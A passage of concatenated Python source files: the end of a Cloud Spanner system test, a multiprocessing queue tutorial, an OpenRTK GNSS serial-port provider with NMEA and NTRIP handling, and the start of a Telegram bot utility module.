sql="SELECT CAST(t as STRUCT<threadid INT64, userid STRING>).* "
"FROM UNNEST(@struct_param) t",
params={"struct_param": [(123, "abcdef")]},
param_types={"struct_param": anon_repeated_array_type},
expected=[(123, "abcdef")],
order=False,
)
# Query and return a struct parameter
value_type = param_types.Struct(
[
param_types.StructField("message", param_types.STRING),
param_types.StructField("repeat", param_types.INT64),
]
)
value_query = (
"SELECT ARRAY(SELECT AS STRUCT message, repeat "
"FROM (SELECT @value.message AS message, "
"@value.repeat AS repeat)) AS value"
)
self._check_sql_results(
self._db,
sql=value_query,
params={"value": ("hello", 1)},
param_types={"value": value_type},
expected=[([["hello", 1]],)],
order=False,
)
def test_execute_sql_returning_transfinite_floats(self):
with self._db.snapshot(multi_use=True) as snapshot:
# Query returning -inf, +inf, NaN as column values
rows = list(
snapshot.execute_sql(
"SELECT "
'CAST("-inf" AS FLOAT64), '
'CAST("+inf" AS FLOAT64), '
'CAST("NaN" AS FLOAT64)'
)
)
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], float("-inf"))
self.assertEqual(rows[0][1], float("+inf"))
# NaNs cannot be compared by equality.
self.assertTrue(math.isnan(rows[0][2]))
# Query returning array of -inf, +inf, NaN as one column
rows = list(
snapshot.execute_sql(
"SELECT"
' [CAST("-inf" AS FLOAT64),'
' CAST("+inf" AS FLOAT64),'
' CAST("NaN" AS FLOAT64)]'
)
)
self.assertEqual(len(rows), 1)
float_array = rows[0][0]
self.assertEqual(float_array[0], float("-inf"))
self.assertEqual(float_array[1], float("+inf"))
# NaNs cannot be searched for by equality.
self.assertTrue(math.isnan(float_array[2]))
def test_partition_query(self):
row_count = 40
sql = "SELECT * FROM {}".format(self.TABLE)
committed = self._set_up_table(row_count)
# Paritioned query does not support ORDER BY
all_data_rows = set(self._row_data(row_count))
union = set()
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
for batch in batch_txn.generate_query_batches(sql):
p_results_iter = batch_txn.process(batch)
# Lists aren't hashable so the results need to be converted
rows = [tuple(result) for result in p_results_iter]
union.update(set(rows))
self.assertEqual(union, all_data_rows)
batch_txn.close()
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
database = instance.database(DATABASE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
cls._db = database
def _verify_one_column(self, table_desc):
sql = "SELECT chunk_me FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = "SELECT chunk_me, chunk_me_2 FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FORTY_KAY
self._verify_one_column(FORTY_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = "key1"
KEY2 = "key2"
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]]
)
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
class FauxCall(object):
def __init__(self, code, details="FauxCall"):
self._code = code
self._details = details
def initial_metadata(self):
return {}
def trailing_metadata(self):
return {}
def code(self):
return self._code
def details(self):
return self._details
|
multiprocessing3_queue.py
|
# View more 3_python 1_tensorflow_new tutorial on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
import multiprocessing as mp
def job(q):
res = 0
for i in range(1000):
res += i+i**2+i**3
q.put(res) # queue
if __name__ == '__main__':
q = mp.Queue()
p1 = mp.Process(target=job, args=(q,))
p2 = mp.Process(target=job, args=(q,))
p1.start()
p2.start()
p1.join()
p2.join()
res1 = q.get()
res2 = q.get()
print(res1+res2)
|
uart_provider.py
|
import os
import time
import json
import datetime
import threading
import math
import re
import serial
import serial.tools.list_ports
from .ntrip_client import NTRIPClient
from ...framework.utils import (
helper, resource
)
from ...framework.context import APP_CONTEXT
from ..base.uart_base import OpenDeviceBase
from ..configs.openrtk_predefine import (
APP_STR, get_app_names
)
from ..decorator import with_device_message
from .firmware_parser import parser as firmware_content_parser
from ...models import InternalCombineAppParseRule
from ..upgrade_workers import (
FirmwareUpgradeWorker,
SDKUpgradeWorker
)
from ..upgrade_center import UpgradeCenter
from ..parsers.open_field_parser import encode_value
class Provider(OpenDeviceBase):
'''
OpenRTK UART provider
'''
def __init__(self, communicator, *args):
super(Provider, self).__init__(communicator)
self.type = 'RTK'
self.server_update_rate = 100
self.sky_data = []
self.pS_data = []
self.bootloader_baudrate = 115200
self.app_config_folder = ''
self.device_info = None
self.app_info = None
self.parameters = None
self.setting_folder_path = None
self.connection_file = None
self.data_folder = None
self.debug_serial_port = None
self.rtcm_serial_port = None
self.user_logf = None
self.debug_logf = None
self.rtcm_logf = None
self.debug_c_f = None
self.enable_data_log = False
self.is_app_matched = False
self.ntrip_client_enable = False
self.nmea_buffer = []
self.nmea_sync = 0
self.prepare_folders()
self.ntripClient = None
self.connected = True
def prepare_folders(self):
'''
Prepare folders for data storage and configuration
'''
executor_path = resource.get_executor_path()
setting_folder_name = 'setting'
config_file_name = 'openrtk.json'
data_folder_path = os.path.join(executor_path, 'data')
if not os.path.isdir(data_folder_path):
os.makedirs(data_folder_path)
self.data_folder = data_folder_path
self.connection_file = os.path.join(
executor_path, setting_folder_name, 'connection.json')
# copy contents of app_config under executor path
self.setting_folder_path = os.path.join(
executor_path, setting_folder_name, 'openrtk')
for app_name in get_app_names():
app_name_path = os.path.join(self.setting_folder_path, app_name)
app_name_config_path = os.path.join(
app_name_path, config_file_name)
if not os.path.isfile(app_name_config_path):
if not os.path.isdir(app_name_path):
os.makedirs(app_name_path)
app_config_content = resource.get_content_from_bundle(
setting_folder_name, os.path.join('openrtk', app_name, config_file_name))
if app_config_content is None:
continue
with open(app_name_config_path, "wb") as code:
code.write(app_config_content)
def ping(self):
'''
Check if the connected device is OpenRTK
'''
# print('start to check if it is openrtk')
device_info_text = self.internal_input_command('pG')
app_info_text = self.internal_input_command('gV')
APP_CONTEXT.get_logger().logger.debug('Checking if is OpenRTK device...')
APP_CONTEXT.get_logger().logger.debug(
'Device: {0}'.format(device_info_text))
APP_CONTEXT.get_logger().logger.debug(
'Firmware: {0}'.format(app_info_text))
if device_info_text.find('OpenRTK') > -1:
self._build_device_info(device_info_text)
self._build_app_info(app_info_text)
self.connected = True
print('# Connected Information #')
split_device_info = device_info_text.split(' ')
print('Device: {0} {1} {2} {3}'.format(split_device_info[0], split_device_info[2], split_device_info[3], split_device_info[4]))
print('APP version:', app_info_text)
APP_CONTEXT.get_logger().logger.info(
'Connected {0}, {1}'.format(device_info_text, app_info_text))
return True
return False
def build_device_info(self, device_info, app_info):
self._build_device_info(device_info)
self._build_app_info(app_info)
def _build_device_info(self, text):
'''
Build device info
'''
split_text = text.split(' ')
sn = split_text[4]
# remove the prefix of SN
if sn.find('SN:') == 0:
sn = sn[3:]
self.device_info = {
'name': split_text[0],
'imu': split_text[1],
'pn': split_text[2],
'firmware_version': split_text[3],
'sn': sn
}
def _build_app_info(self, text):
'''
Build app info
'''
app_version = text
split_text = app_version.split(' ')
app_name = next(
(item for item in APP_STR if item in split_text), None)
if not app_name:
app_name = 'INS'
self.is_app_matched = False
else:
self.is_app_matched = True
self.app_info = {
'app_name': app_name,
'version': text
}
def load_properties(self):
# Load config from user working path
local_config_file_path = os.path.join(os.getcwd(), 'openrtk.json')
if os.path.isfile(local_config_file_path):
with open(local_config_file_path) as json_data:
self.properties = json.load(json_data)
return
# Load the openimu.json based on its app
app_name = self.app_info['app_name']
app_file_path = os.path.join(
self.setting_folder_path, app_name, 'openrtk.json')
with open(app_file_path) as json_data:
self.properties = json.load(json_data)
def ntrip_client_thread(self):
self.ntripClient = NTRIPClient(self.properties, self.communicator)
self.ntripClient.run()
def build_connected_serial_port_info(self):
if not os.path.isfile(self.connection_file):
return None, None
with open(self.connection_file) as json_data:
connection = json.load(json_data)
user_port = connection['port']
user_port_num = ''
port_name = ''
for i in range(len(user_port)-1, -1, -1):
if (user_port[i] >= '0' and user_port[i] <= '9'):
user_port_num = user_port[i] + user_port_num
else:
port_name = user_port[:i+1]
break
return user_port_num, port_name
def after_setup(self):
set_user_para = self.cli_options and self.cli_options.set_user_para
self.ntrip_client_enable = self.cli_options and self.cli_options.ntrip_client
# with_raw_log = self.cli_options and self.cli_options.with_raw_log
if set_user_para:
result = self.set_params(
self.properties["initial"]["userParameters"])
##print('set user para {0}'.format(result))
if (result['packetType'] == 'success'):
self.save_config()
if self.ntrip_client_enable:
t = threading.Thread(target=self.ntrip_client_thread)
t.start()
# if with_raw_log:
connection = None
debug_port = ''
rtcm_port = ''
try:
if (self.properties["initial"]["useDefaultUart"]):
user_port_num, port_name = self.build_connected_serial_port_info()
if not user_port_num or not port_name:
return False
#print('user_port {0} {1}'.format(user_port_num, port_name))
debug_port = port_name + str(int(user_port_num) + 2)
rtcm_port = port_name + str(int(user_port_num) + 1)
else:
for x in self.properties["initial"]["uart"]:
if x['enable'] == 1:
if x['name'] == 'DEBUG':
debug_port = x["value"]
elif x['name'] == 'GNSS':
rtcm_port = x["value"]
if self.data_folder is not None:
dir_time = time.strftime("%Y%m%d_%H%M%S", time.localtime())
file_time = time.strftime(
"%Y_%m_%d_%H_%M_%S", time.localtime())
file_name = self.data_folder + '/' + 'openrtk_log_' + dir_time
os.mkdir(file_name)
self.user_logf = open(
file_name + '/' + 'user_' + file_time + '.bin', "wb")
if rtcm_port != '':
print('OpenRTK log GNSS UART {0}'.format(rtcm_port))
self.rtcm_serial_port = serial.Serial(
rtcm_port, '460800', timeout=0.1)
if self.rtcm_serial_port.isOpen():
self.rtcm_logf = open(
file_name + '/' + 'rtcm_rover_' + file_time + '.bin', "wb")
t = threading.Thread(
target=self.thread_rtcm_port_receiver, args=(file_name,))
t.start()
if debug_port != '':
print('OpenRTK log DEBUG UART {0}'.format(debug_port))
self.debug_serial_port = serial.Serial(
debug_port, '460800', timeout=0.1)
if self.debug_serial_port.isOpen():
if self.app_info['app_name'] == 'RAWDATA':
self.debug_logf = open(
file_name + '/' + 'rtcm_base_' + file_time + '.bin', "wb")
elif self.app_info['app_name'] == 'RTK':
self.debug_logf = open(
file_name + '/' + 'rtcm_base_' + file_time + '.bin', "wb")
else:
self.debug_logf = open(
file_name + '/' + 'debug_' + file_time + '.bin', "wb")
t = threading.Thread(
target=self.thread_debug_port_receiver, args=(file_name,))
t.start()
except Exception as e:
if self.debug_serial_port is not None:
if self.debug_serial_port.isOpen():
self.debug_serial_port.close()
if self.rtcm_serial_port is not None:
if self.rtcm_serial_port.isOpen():
self.rtcm_serial_port.close()
self.debug_serial_port = None
self.rtcm_serial_port = None
print(e)
return False
def nmea_checksum(self, data):
data = data.replace("\r", "").replace("\n", "").replace("$", "")
nmeadata, cksum = re.split('\*', data)
calc_cksum = 0
for s in nmeadata:
calc_cksum ^= ord(s)
return int(cksum, 16), calc_cksum
def on_read_raw(self, data):
for bytedata in data:
if bytedata == 0x24:
self.nmea_buffer = []
self.nmea_sync = 0
self.nmea_buffer.append(chr(bytedata))
else:
self.nmea_buffer.append(chr(bytedata))
if self.nmea_sync == 0:
if bytedata == 0x0D:
self.nmea_sync = 1
elif self.nmea_sync == 1:
if bytedata == 0x0A:
try:
str_nmea = ''.join(self.nmea_buffer)
cksum, calc_cksum = self.nmea_checksum(
str_nmea)
if cksum == calc_cksum:
if str_nmea.find("$GPGGA") != -1:
print()
if self.ntrip_client_enable and self.ntripClient != None:
self.ntripClient.send(str_nmea)
print(str_nmea, end = '')
# else:
# print("nmea checksum wrong {0} {1}".format(cksum, calc_cksum))
except Exception as e:
# print('NMEA fault:{0}'.format(e))
pass
self.nmea_buffer = []
self.nmea_sync = 0
if self.user_logf is not None:
self.user_logf.write(data)
def thread_debug_port_receiver(self, *args, **kwargs):
if self.debug_logf is None:
return
is_get_configuration = 0
file_name = args[0]
self.debug_c_f = open(file_name + '/' + 'configuration.txt', "w")
while True:
if is_get_configuration:
break
cmd_configuration = 'get configuration\r\n'
self.debug_serial_port.write(cmd_configuration.encode())
try_times = 20
for i in range(try_times):
data_buffer = self.debug_serial_port.read(500)
if len(data_buffer):
try:
#print('len = {0}'.format(len(data_buffer)))
str_data = bytes.decode(data_buffer)
# print('{0}'.format(str_data))
json_data = json.loads(str_data)
for key in json_data.keys():
if key == 'openrtk configuration':
print('{0}'.format(json_data))
if self.debug_c_f:
self.debug_c_f.write(str_data)
self.debug_c_f.close()
is_get_configuration = 1
if is_get_configuration:
break
except Exception as e:
#print('DEBUG PORT Thread:json error:', e)
# the json will not be completed
pass
cmd_log = 'log debug on\r\n'
self.debug_serial_port.write(cmd_log.encode())
# log data
while True:
try:
data = bytearray(self.debug_serial_port.read_all())
except Exception as e:
print('DEBUG PORT Thread:receiver error:', e)
return # exit thread receiver
if len(data):
self.debug_logf.write(data)
else:
time.sleep(0.001)
def thread_rtcm_port_receiver(self, *args, **kwargs):
if self.rtcm_logf is None:
return
while True:
try:
data = bytearray(self.rtcm_serial_port.read_all())
except Exception as e:
print('RTCM PORT Thread:receiver error:', e)
return # exit thread receiver
if len(data):
self.rtcm_logf.write(data)
else:
time.sleep(0.001)
def on_receive_output_packet(self, packet_type, data, error=None):
'''
Listener for getting output packet
'''
# $GPGGA,080319.00,3130.4858508,N,12024.0998832,E,4,25,0.5,12.459,M,0.000,M,2.0,*46
if packet_type == 'gN':
if self.ntrip_client_enable:
# $GPGGA
gpgga = '$GPGGA'
# time
timeOfWeek = float(data['GPS_TimeofWeek'])
dsec = int(timeOfWeek)
msec = timeOfWeek - dsec
sec = dsec % 86400
hour = int(sec / 3600)
minute = int(sec % 3600 / 60)
second = sec % 60
gga_time = format(hour*10000 + minute*100 +
second + msec - 18, '09.2f')
gpgga = gpgga + ',' + gga_time
# latitude
latitude = float(data['latitude']) * 180 / 2147483648.0
if latitude >= 0:
latflag = 'N'
else:
latflag = 'S'
latitude = math.fabs(latitude)
lat_d = int(latitude)
lat_m = (latitude-lat_d) * 60
lat_dm = format(lat_d*100 + lat_m, '012.7f')
gpgga = gpgga + ',' + lat_dm + ',' + latflag
# longitude
longitude = float(data['longitude']) * 180 / 2147483648.0
if longitude >= 0:
lonflag = 'E'
else:
lonflag = 'W'
longitude = math.fabs(longitude)
lon_d = int(longitude)
lon_m = (longitude-lon_d) * 60
lon_dm = format(lon_d*100 + lon_m, '013.7f')
gpgga = gpgga + ',' + lon_dm + ',' + lonflag
# positionMode
gpgga = gpgga + ',' + str(data['positionMode'])
# svs
gpgga = gpgga + ',' + str(data['numberOfSVs'])
# hop
gpgga = gpgga + ',' + format(float(data['hdop']), '03.1f')
# height
gpgga = gpgga + ',' + \
format(float(data['height']), '06.3f') + ',M'
#
gpgga = gpgga + ',0.000,M'
# diffage
gpgga = gpgga + ',' + \
format(float(data['diffage']), '03.1f') + ','
# ckm
checksum = 0
for i in range(1, len(gpgga)):
checksum = checksum ^ ord(gpgga[i])
str_checksum = hex(checksum)
if str_checksum.startswith("0x"):
str_checksum = str_checksum[2:]
gpgga = gpgga + '*' + str_checksum + '\r\n'
print(gpgga)
if self.ntripClient != None:
self.ntripClient.send(gpgga)
return
elif packet_type == 'pS':
try:
if data['latitude'] != 0.0 and data['longitude'] != 0.0:
if self.pS_data:
if self.pS_data['GPS_Week'] == data['GPS_Week']:
if data['GPS_TimeofWeek'] - self.pS_data['GPS_TimeofWeek'] >= 0.2:
self.add_output_packet('stream', 'pos', data)
self.pS_data = data
if data['insStatus'] >= 3 and data['insStatus'] <= 5:
ins_status = 'INS_INACTIVE'
if data['insStatus'] == 3:
ins_status = 'INS_SOLUTION_GOOD'
elif data['insStatus'] == 4:
ins_status = 'INS_SOLUTION_FREE'
elif data['insStatus'] == 5:
ins_status = 'INS_ALIGNMENT_COMPLETE'
ins_pos_type = 'INS_INVALID'
if data['insPositionType'] == 1:
ins_pos_type = 'INS_SPP'
elif data['insPositionType'] == 4:
ins_pos_type = 'INS_RTKFIXED'
elif data['insPositionType'] == 5:
ins_pos_type = 'INS_RTKFLOAT'
inspva = '#INSPVA,%s,%10.2f, %s, %s,%12.8f,%13.8f,%8.3f,%9.3f,%9.3f,%9.3f,%9.3f,%9.3f,%9.3f' %\
(data['GPS_Week'], data['GPS_TimeofWeek'], ins_status, ins_pos_type,
data['latitude'], data['longitude'], data['height'],
data['velocityNorth'], data['velocityEast'], data['velocityUp'],
data['roll'], data['pitch'], data['heading'])
print(inspva)
else:
self.add_output_packet('stream', 'pos', data)
self.pS_data = data
else:
self.add_output_packet('stream', 'pos', data)
self.pS_data = data
except Exception as e:
# print(e)
pass
elif packet_type == 'sK':
if self.sky_data:
if self.sky_data[0]['timeOfWeek'] == data[0]['timeOfWeek']:
self.sky_data.extend(data)
else:
self.add_output_packet('stream', 'skyview', self.sky_data)
self.add_output_packet('stream', 'snr', self.sky_data)
self.sky_data = []
self.sky_data.extend(data)
else:
self.sky_data.extend(data)
else:
output_packet_config = next(
(x for x in self.properties['userMessages']['outputPackets']
if x['name'] == packet_type), None)
if output_packet_config and output_packet_config.__contains__('from') \
and output_packet_config['from'] == 'imu':
self.add_output_packet('stream', 'imu', data)
def do_write_firmware(self, firmware_content):
rules = [
InternalCombineAppParseRule('rtk', 'rtk_start:', 4),
InternalCombineAppParseRule('sdk', 'sdk_start:', 4),
]
parsed_content = firmware_content_parser(firmware_content, rules)
user_port_num, port_name = self.build_connected_serial_port_info()
sdk_port = port_name + str(int(user_port_num) + 3)
sdk_uart = serial.Serial(sdk_port, 115200, timeout=0.1)
if not sdk_uart.isOpen():
raise Exception('Cannot open SDK upgrade port')
upgrade_center = UpgradeCenter()
upgrade_center.register(
FirmwareUpgradeWorker(self.communicator, parsed_content['rtk']))
upgrade_center.register(
SDKUpgradeWorker(sdk_uart, parsed_content['sdk']))
upgrade_center.on('progress', self.handle_upgrade_process)
upgrade_center.on('error', self.handle_upgrade_error)
upgrade_center.on('finish', self.handle_upgrade_complete)
upgrade_center.start()
def get_device_connection_info(self):
return {
'modelName': self.device_info['name'],
'deviceType': self.type,
'serialNumber': self.device_info['sn'],
'partNumber': self.device_info['pn'],
'firmware': self.device_info['firmware_version']
}
# command list
def server_status(self, *args): # pylint: disable=invalid-name
'''
Get server connection status
'''
return {
'packetType': 'ping',
'data': {'status': '1'}
}
def get_device_info(self, *args): # pylint: disable=invalid-name
'''
Get device information
'''
return {
'packetType': 'deviceInfo',
'data': [
{'name': 'Product Name', 'value': self.device_info['name']},
{'name': 'IMU', 'value': self.device_info['imu']},
{'name': 'PN', 'value': self.device_info['pn']},
{'name': 'Firmware Version',
'value': self.device_info['firmware_version']},
{'name': 'SN', 'value': self.device_info['sn']},
{'name': 'App Version', 'value': self.app_info['version']}
]
}
def get_log_info(self):
'''
Build information for log
'''
return {
"type": self.type,
"model": self.device_info['name'],
"logInfo": {
"pn": self.device_info['pn'],
"sn": self.device_info['sn'],
"rtkProperties": json.dumps(self.properties)
}
}
def get_conf(self, *args): # pylint: disable=unused-argument
'''
Get json configuration
'''
return {
'packetType': 'conf',
'data': {
'outputs': self.properties['userMessages']['outputPackets'],
'inputParams': self.properties['userConfiguration']
}
}
@with_device_message
def get_params(self, *args): # pylint: disable=unused-argument
'''
Get all parameters
'''
has_error = False
parameter_values = []
if self.app_info['app_name'] == 'INS':
conf_parameters = self.properties['userConfiguration']
conf_parameters_len = len(conf_parameters)-1
step = 10
for i in range(2, conf_parameters_len, step):
start_byte = i
end_byte = i+step-1 if i+step < conf_parameters_len else conf_parameters_len
command_line = helper.build_packet(
'gB', [start_byte, end_byte])
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
has_error = True
break
parameter_values.extend(result['data'])
else:
command_line = helper.build_input_packet('gA')
result = yield self._message_center.build(command=command_line, timeout=3)
if result['error']:
has_error = True
parameter_values = result['data']
if not has_error:
self.parameters = parameter_values
yield {
'packetType': 'inputParams',
'data': parameter_values
}
yield {
'packetType': 'error',
'data': 'No Response'
}
@with_device_message
def get_param(self, params, *args): # pylint: disable=unused-argument
'''
Update paramter value
'''
command_line = helper.build_input_packet(
'gP', properties=self.properties, param=params['paramId'])
# self.communicator.write(command_line)
# result = self.get_input_result('gP', timeout=1)
result = yield self._message_center.build(command=command_line)
if result['data']:
self.parameters = result['data']
yield {
'packetType': 'inputParam',
'data': result['data']
}
yield {
'packetType': 'error',
'data': 'No Response'
}
@with_device_message
def set_params(self, params, *args): # pylint: disable=unused-argument
'''
Update paramters value
'''
input_parameters = self.properties['userConfiguration']
grouped_parameters = {}
for parameter in params:
exist_parameter = next(
(x for x in input_parameters if x['paramId'] == parameter['paramId']), None)
if exist_parameter:
has_group = grouped_parameters.__contains__(
exist_parameter['category'])
if not has_group:
grouped_parameters[exist_parameter['category']] = []
current_group = grouped_parameters[exist_parameter['category']]
current_group.append(
{'paramId': parameter['paramId'], 'value': parameter['value'], 'type': exist_parameter['type']})
for group in grouped_parameters.values():
message_bytes = []
for parameter in group:
message_bytes.extend(
encode_value('int8', parameter['paramId'])
)
message_bytes.extend(
encode_value(parameter['type'], parameter['value'])
)
# print('parameter type {0}, value {1}'.format(
# parameter['type'], parameter['value']))
# result = self.set_param(parameter)
command_line = helper.build_packet(
'uB', message_bytes)
# for s in command_line:
# print(hex(s))
result = yield self._message_center.build(command=command_line)
packet_type = result['packet_type']
data = result['data']
if packet_type == 'error':
yield {
'packetType': 'error',
'data': {
'error': data
}
}
break
if data > 0:
yield {
'packetType': 'error',
'data': {
'error': data
}
}
break
yield {
'packetType': 'success',
'data': {
'error': 0
}
}
@with_device_message
def set_param(self, params, *args): # pylint: disable=unused-argument
'''
Update paramter value
'''
command_line = helper.build_input_packet(
'uP', properties=self.properties, param=params['paramId'], value=params['value'])
# self.communicator.write(command_line)
# result = self.get_input_result('uP', timeout=1)
result = yield self._message_center.build(command=command_line)
error = result['error']
data = result['data']
if error:
yield {
'packetType': 'error',
'data': {
'error': data
}
}
yield {
'packetType': 'success',
'data': {
'error': data
}
}
@with_device_message
def save_config(self, *args): # pylint: disable=unused-argument
'''
Save configuration
'''
command_line = helper.build_input_packet('sC')
# self.communicator.write(command_line)
# result = self.get_input_result('sC', timeout=2)
result = yield self._message_center.build(command=command_line, timeout=2)
data = result['data']
error = result['error']
if data:
yield {
'packetType': 'success',
'data': error
}
yield {
'packetType': 'success',
'data': error
}
@with_device_message
def reset_params(self, params, *args): # pylint: disable=unused-argument
'''
Reset params to default
'''
command_line = helper.build_input_packet('rD')
result = yield self._message_center.build(command=command_line, timeout=2)
error = result['error']
data = result['data']
if error:
yield {
'packetType': 'error',
'data': {
'error': error
}
}
yield {
'packetType': 'success',
'data': data
}
def upgrade_framework(self, params, *args): # pylint: disable=unused-argument
'''
Upgrade framework
'''
file = ''
if isinstance(params, str):
file = params
if isinstance(params, dict):
file = params['file']
# start a thread to do upgrade
if not self.is_upgrading:
self.is_upgrading = True
self._message_center.pause()
if self._logger is not None:
self._logger.stop_user_log()
thread = threading.Thread(
target=self.thread_do_upgrade_framework, args=(file,))
thread.start()
print("Upgrade OpenRTK firmware started at:[{0}].".format(
datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
return {
'packetType': 'success'
}
|
util.py
|
# -*- coding: utf-8 -*-
import random
import re
import string
import threading
import traceback
import warnings
import functools
import queue as Queue
import logging
try:
from PIL import Image
from io import BytesIO
pil_imported = True
except:
pil_imported = False
logger = logging.getLogger('TeleBot')
thread_local = threading.local()
content_type_media = [
'text', 'audio', 'document', 'photo', 'sticker', 'video', 'video_note', 'voice', 'contact', 'dice', 'poll',
'venue', 'location'
]
content_type_service = [
'new_chat_members', 'left_chat_member', 'new_chat_title', 'new_chat_photo', 'delete_chat_photo', 'group_chat_created',
'supergroup_chat_created', 'channel_chat_created', 'migrate_to_chat_id', 'migrate_from_chat_id', 'pinned_message'
]
class WorkerThread(threading.Thread):
count = 0
def __init__(self, exception_callback=None, queue=None, name=None):
if not name:
name = "WorkerThread{0}".format(self.__class__.count + 1)
self.__class__.count += 1
if not queue:
queue = Queue.Queue()
threading.Thread.__init__(self, name=name)
self.queue = queue
self.daemon = True
self.received_task_event = threading.Event()
self.done_event = threading.Event()
self.exception_event = threading.Event()
self.continue_event = threading.Event()
self.exception_callback = exception_callback
self.exception_info = None
self._running = True
self.start()
def run(self):
while self._running:
try:
task, args, kwargs = self.queue.get(block=True, timeout=.5)
self.continue_event.clear()
self.received_task_event.clear()
self.done_event.clear()
self.exception_event.clear()
logger.debug("Received task")
self.received_task_event.set()
task(*args, **kwargs)
logger.debug("Task complete")
self.done_event.set()
except Queue.Empty:
pass
except Exception as e:
logger.debug(type(e).__name__ + " occurred, args=" + str(e.args) + "\n" + traceback.format_exc())
self.exception_info = e
self.exception_event.set()
if self.exception_callback:
self.exception_callback(self, self.exception_info)
self.continue_event.wait()
def put(self, task, *args, **kwargs):
self.queue.put((task, args, kwargs))
def raise_exceptions(self):
if self.exception_event.is_set():
raise self.exception_info
def clear_exceptions(self):
self.exception_event.clear()
self.continue_event.set()
def stop(self):
self._running = False
class ThreadPool:
def __init__(self, num_threads=2):
self.tasks = Queue.Queue()
self.workers = [WorkerThread(self.on_exception, self.tasks) for _ in range(num_threads)]
self.num_threads = num_threads
self.exception_event = threading.Event()
self.exception_info = None
def put(self, func, *args, **kwargs):
self.tasks.put((func, args, kwargs))
def on_exception(self, worker_thread, exc_info):
self.exception_info = exc_info
self.exception_event.set()
worker_thread.continue_event.set()
def raise_exceptions(self):
if self.exception_event.is_set():
raise self.exception_info
def clear_exceptions(self):
self.exception_event.clear()
def close(self):
for worker in self.workers:
worker.stop()
for worker in self.workers:
worker.join()
class AsyncTask:
def __init__(self, target, *args, **kwargs):
self.target = target
self.args = args
self.kwargs = kwargs
self.done = False
self.thread = threading.Thread(target=self._run)
self.thread.start()
def _run(self):
try:
self.result = self.target(*self.args, **self.kwargs)
except Exception as e:
self.result = e
self.done = True
def wait(self):
if not self.done:
self.thread.join()
if isinstance(self.result, BaseException):
raise self.result
else:
return self.result
def async_dec():
def decorator(fn):
def wrapper(*args, **kwargs):
return AsyncTask(fn, *args, **kwargs)
return wrapper
return decorator
def is_string(var):
return isinstance(var, str)
def is_dict(var):
return isinstance(var, dict)
def is_bytes(var):
return isinstance(var, bytes)
def is_pil_image(var):
return pil_imported and isinstance(var, Image.Image)
def pil_image_to_file(image, extension='JPEG', quality='web_low'):
if pil_imported:
photoBuffer = BytesIO()
image.convert('RGB').save(photoBuffer, extension, quality=quality)
photoBuffer.seek(0)
return photoBuffer
else:
raise RuntimeError('PIL module is not imported')
def is_command(text):
"""
Checks if `text` is a command. Telegram chat commands start with the '/' character.
:param text: Text to check.
:return: True if `text` is a command, else False.
"""
if (text is None): return None
return text.startswith('/')
def extract_command(text):
"""
Extracts the command from `text` (minus the '/') if `text` is a command (see is_command).
If `text` is not a command, this function returns None.
Examples:
extract_command('/help'): 'help'
extract_command('/help@BotName'): 'help'
extract_command('/search black eyed peas'): 'search'
extract_command('Good day to you'): None
:param text: String to extract the command from
:return: the command if `text` is a command (according to is_command), else None.
"""
if (text is None): return None
return text.split()[0].split('@')[0][1:] if is_command(text) else None
def split_string(text, chars_per_string):
"""
Splits one string into multiple strings, with a maximum amount of `chars_per_string` characters per string.
This is very useful for splitting one giant message into multiples.
